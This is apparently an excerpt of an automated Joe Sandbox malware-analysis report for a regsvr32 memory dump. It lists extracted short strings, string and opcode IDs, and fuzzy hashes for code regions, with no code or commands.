                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: QZB$Vu9($W1Z
                                                  • API String ID: 0-4157987319
                                                  • Opcode ID: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                  • Instruction ID: f699ba934c7511d53ebf66ced97cbd47477d8f387fb8544ab73dfc8f8e8f4cc9
                                                  • Opcode Fuzzy Hash: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                  • Instruction Fuzzy Hash: 7DE1E870505B888FDBB9DF24CC897EBBBE1FB84705F10551EE84A9A290DBB49648CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #X$1c+$,p
                                                  • API String ID: 0-4193689514
                                                  • Opcode ID: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                  • Instruction ID: a14642629d5f8cbd2a1e8fb09d7711f81952208659678b8c12dc59c418106fb0
                                                  • Opcode Fuzzy Hash: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                  • Instruction Fuzzy Hash: A0F166B5906749CFCB88DF68C28A58D7BF1BF59304F404129FC1A9A260D3B4E529CB49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :a$o1$F
                                                  • API String ID: 0-2167756397
                                                  • Opcode ID: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                  • Instruction ID: c7b3f013bdef5c33efa64e5817367d2177fa9b070e37e7fa0e85b95e6b1d5a97
                                                  • Opcode Fuzzy Hash: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                  • Instruction Fuzzy Hash: 24A10170514609DFCB98DF28C58A6DE3BE1FF58318F40822AFC0A9B264C774DA58DB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "7F$hso$|
                                                  • API String ID: 0-2223032787
                                                  • Opcode ID: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                  • Instruction ID: 597be8bf6f8274430a7b1b716aee764a508e33f64a18c5174bbc12e988f7dea5
                                                  • Opcode Fuzzy Hash: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                  • Instruction Fuzzy Hash: CDA1E7716057888FEB7ADF64C8AA7DE7BA1FF59308F40461DD98E8E250C7B45608CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: eG$ktw$l$6
                                                  • API String ID: 0-3696190584
                                                  • Opcode ID: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                  • Instruction ID: ec7ece3e5b0c03f4df558a0a1733d02cea5b85f33e09dae2f6683fda9d55fcb2
                                                  • Opcode Fuzzy Hash: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                  • Instruction Fuzzy Hash: E47114B0509708EFCB98DF68C089A9E7BB1FB88344F40C52EE849DB264C775DA19CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %Di|$6qp$Z9s
                                                  • API String ID: 0-2690900941
                                                  • Opcode ID: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                  • Instruction ID: 2c0d7369d6c4e2fe59306caeaa3cf354025216a739d91ba443ab140e2def37b4
                                                  • Opcode Fuzzy Hash: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                  • Instruction Fuzzy Hash: 9C61257191070C9BCB88CF24C8C96DE7BB1FB483A8F556219FC0AAA294C7749985CF84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Fl$Fl$vv5
                                                  • API String ID: 0-3053741108
                                                  • Opcode ID: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                  • Instruction ID: 55f6967587c9a541224425d329b03615816d53db549f94b6db3b05c8e91cbb03
                                                  • Opcode Fuzzy Hash: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                  • Instruction Fuzzy Hash: FC511A70E4870CAFDB69DFA8E0866DDBBF1FB58344F004519E40AE7291DB74990ACB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: _ N$dows\system32\OLEAUT32.dll$nkz
                                                  • API String ID: 0-3089747839
                                                  • Opcode ID: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                  • Instruction ID: b07831c94fe2cbd7ac58294498593f0ee6961182af88fd212fccb4805bec53d6
                                                  • Opcode Fuzzy Hash: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                  • Instruction Fuzzy Hash: 39513971D04A1D8BDF99CFA8C5457EEBBB1FB48344F108119E415BB250CBB89A09CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H8$nn$nn
                                                  • API String ID: 0-4263809824
                                                  • Opcode ID: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                  • Instruction ID: 3c01ac5d5c2d3476a5cfb8eba6abf236e6c64549312703f260b6bb5002efdfbd
                                                  • Opcode Fuzzy Hash: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                  • Instruction Fuzzy Hash: 5361D67555878CCBEBBADF38CC897D97BB1FB48344F908219D80E8A260DB7457498B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %Nz$,7%$}]{
                                                  • API String ID: 0-2809531587
                                                  • Opcode ID: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                  • Instruction ID: b36c8970f11ad41429e233920f6dac2517fe43d92b96f19f813f385ea8bb4fb2
                                                  • Opcode Fuzzy Hash: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                  • Instruction Fuzzy Hash: B771E470448788CBEBB5DF24C8856DEBBE4FB88744F60451DE9598B260DB749688CF01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,mQ$f41$c
                                                  • API String ID: 0-1594525360
                                                  • Opcode ID: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                  • Instruction ID: ca916729033610084f534c396dc33c1afc583cc00ddec4c12c7a73cc6334aceb
                                                  • Opcode Fuzzy Hash: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                  • Instruction Fuzzy Hash: AD51C071D0424C8BCB48DFA9E98A9DDBBF0FB48348F11820DE85AB7261C7749905CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q~$%s$R3
                                                  • API String ID: 0-2520873970
                                                  • Opcode ID: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                  • Instruction ID: 49708784934b6f27b099c9a4c0d62a5c340693359db0e98dd39e1096da177659
                                                  • Opcode Fuzzy Hash: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                  • Instruction Fuzzy Hash: 2D414870508784DBD398CF18C0DA65EBBF1FB853A4FA0691DF583862A4DB75D9898B03
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [/$s$|'
                                                  • API String ID: 0-508247755
                                                  • Opcode ID: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                  • Instruction ID: 494a7eb40676bfcc00c7fdba1f25141f52c7cc4812b1f7e8e8b884a852a0e06c
                                                  • Opcode Fuzzy Hash: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                  • Instruction Fuzzy Hash: 1841D4B090038E8FCB48DFA9D88A5DEBBB1FB48348F10461DEC25A6250D7B49554CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: _#>$`cb{$fq
                                                  • API String ID: 0-41881557
                                                  • Opcode ID: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                  • Instruction ID: 8d8b26aa43ab9a83d147a377112b64bfb8255cca975d25c3e902dea97d059722
                                                  • Opcode Fuzzy Hash: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                  • Instruction Fuzzy Hash: 2941C0B180078E8FCF48CF64C88A5DE7FB0FB58358F104619E86AA6250D3B89665CFC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: =Z8$[U${To
                                                  • API String ID: 0-582923006
                                                  • Opcode ID: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                  • Instruction ID: dd1ba70993956fe5376c9027ab0fa5dab7ea2e8642491db667c41f00a9894f6d
                                                  • Opcode Fuzzy Hash: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                  • Instruction Fuzzy Hash: DA31AFB090074ECBCB88DF64C88A4DF7FB4FB68398F104219E855A6250D3B896A5CFD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L$u.
                                                  • API String ID: 0-1908859981
                                                  • Opcode ID: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                  • Instruction ID: fe013bb6a98280fd3664de29af0d6deafe853b8c6d857857911529a75c261ac8
                                                  • Opcode Fuzzy Hash: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                  • Instruction Fuzzy Hash: FDE1167152478DABDF98CF28C8C6ADD3BA1FB48394F906229FD0287260D775D985CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: v^$|8W
                                                  • API String ID: 0-4274756280
                                                  • Opcode ID: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                  • Instruction ID: eb46043f5dfd862e599a3e1f0545fc92660674d3eece30cf186a2abccef00301
                                                  • Opcode Fuzzy Hash: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                  • Instruction Fuzzy Hash: 23D11171A0630CCBDB68DF68C58AA9D7BE1FF59348F104129FC1A9B261C770E919CB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `:$u5\
                                                  • API String ID: 0-1141760586
                                                  • Opcode ID: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                  • Instruction ID: 309421123f437f89acc2771e6a55141bc20ba277e2d56715f434ec53ca724750
                                                  • Opcode Fuzzy Hash: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                  • Instruction Fuzzy Hash: 69C1207150574DCBDB99CF28C58A6D93BE5FF98348F104129FC0E862A1CBB4EA18CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0Au$]6
                                                  • API String ID: 0-775207805
                                                  • Opcode ID: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                  • Instruction ID: 6edab2825e6f92fa7d6d5649e6783b0aef41eda7633721283519dacdcc01bd9d
                                                  • Opcode Fuzzy Hash: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                  • Instruction Fuzzy Hash: 2DE1D7706047889FCBBEDF24CC897DA7BA8FB46704F904619E9C98E250DB745748CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S9$qrd
                                                  • API String ID: 0-2332744662
                                                  • Opcode ID: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                  • Instruction ID: d3a666ff84b181fad27f9c2352a1e83f1b6bb5c561d3220c9e7978bd2dadc88f
                                                  • Opcode Fuzzy Hash: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                  • Instruction Fuzzy Hash: 6EB1357590660CCFCB69DFA4C08A6DDBBF1EF68344F104519E812AB262CBB0D919CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: hw}2$4&t
                                                  • API String ID: 0-1169878757
                                                  • Opcode ID: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                  • Instruction ID: fd20564dcf1a671b287a6600624e9fb92dead2187b8d5629211a6de17e7e6b55
                                                  • Opcode Fuzzy Hash: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                  • Instruction Fuzzy Hash: AEB168B590420CCFDB68CF78C45A5DD7BF1FB08308F60612AE826AA262D774D919CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: JMWd$a[
                                                  • API String ID: 0-3276560754
                                                  • Opcode ID: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                  • Instruction ID: 3b54873520b9a846c0abc3e4022efff23af49e59c185cad729b6d512d224c3a2
                                                  • Opcode Fuzzy Hash: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                  • Instruction Fuzzy Hash: D5A106706047889FDBBACF18CC857DE3BA8FB46748F504229E8CA8E254CB745749CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %[$-
                                                  • API String ID: 0-2535708364
                                                  • Opcode ID: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                  • Instruction ID: a7604732bdc10a899b7b050bfde45695c0722dd065d5eed74db0117fa162c574
                                                  • Opcode Fuzzy Hash: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                  • Instruction Fuzzy Hash: 1F81627050074ECBDB99DF14C88A7DE3BA0FB28389F114219FC85962A0D778C699CBC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /Mr$i:O:
                                                  • API String ID: 0-3426536595
                                                  • Opcode ID: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                  • Instruction ID: 3eba081f804be6fa3a9d4fb4db8c82f5607d3411af965209965460f3089a80c7
                                                  • Opcode Fuzzy Hash: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                  • Instruction Fuzzy Hash: 7C91087050438C8FDBBADF24C8AA7DE7BA1FB5A304F50461EEA4E8E250DB749644CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6|4$;|-
                                                  • API String ID: 0-2897245347
                                                  • Opcode ID: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                  • Instruction ID: 839a7c11e172a9a14e1c367a044feafa9aab422ef7ede3a919e78660e0b6ca0a
                                                  • Opcode Fuzzy Hash: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                  • Instruction Fuzzy Hash: C0714B7090474D8FCF88DFA4C8866EEBBF0FB48308F114619E88AA7251D7789645CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: US-PC$dQ
                                                  • API String ID: 0-3236294519
                                                  • Opcode ID: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                  • Instruction ID: 9d729ecabb7b74207a0fd84f221a36cedb2a9a3a0e5d95724699f54aa2ea8075
                                                  • Opcode Fuzzy Hash: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                  • Instruction Fuzzy Hash: 3E71E7711187988BDBFDCF28CC857D97BA6FB44744F20811CE84E8E261DB749A89CB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: U$U#
                                                  • API String ID: 0-861755185
                                                  • Opcode ID: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                  • Instruction ID: 3d07f47d2f6b9c27b0e4fe7d5859b29f381f1ada24735b7dc646a2f801c86eef
                                                  • Opcode Fuzzy Hash: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                  • Instruction Fuzzy Hash: 0C515C7150C7449FC7A8DF18D4C67AAB7E0FB88310F90991DF8CAC7251EB70A9598B82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fK$Pr
                                                  • API String ID: 0-2696692655
                                                  • Opcode ID: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                  • Instruction ID: dfe3628fe45c31a405763d5fff7ed8f4d77ec04c4bb6b45016b3f1679df2575b
                                                  • Opcode Fuzzy Hash: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                  • Instruction Fuzzy Hash: 907116B090474E8FDB88CF28C88A6DE7BF0FB18358F515219FC4AA6260D774D598CB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: n\$z+&
                                                  • API String ID: 0-1414119057
                                                  • Opcode ID: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                  • Instruction ID: eeb2c5940d29436bcd670e7d8a2b521530b450e3042878bcb8e4954d48490cde
                                                  • Opcode Fuzzy Hash: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                  • Instruction Fuzzy Hash: 22612070A04B0C8BCBA9DF98D48AADDB7F1FB58344F00411DE846A7390DBB8950ACB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$50
                                                  • API String ID: 0-2436285167
                                                  • Opcode ID: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                  • Instruction ID: 63debb9af518b5fca5d59737c01840b12b974a655eea7ff458552c4fa6b671e5
                                                  • Opcode Fuzzy Hash: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                  • Instruction Fuzzy Hash: 3671DF705087848FD769CF28C58965ABBF0FBC6344F008A1DF68686260CBB6D949CF03
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,{$uC
                                                  • API String ID: 0-1099860252
                                                  • Opcode ID: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                  • Instruction ID: df29777c25f03bc51b29c5e68a382a2b48421fa47568a9dd7f4acde699563025
                                                  • Opcode Fuzzy Hash: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                  • Instruction Fuzzy Hash: 28612D71A04B0C8FDBA9DF98D08A7DEB7F1FB48344F004119E406E7291DBB8990ADB85
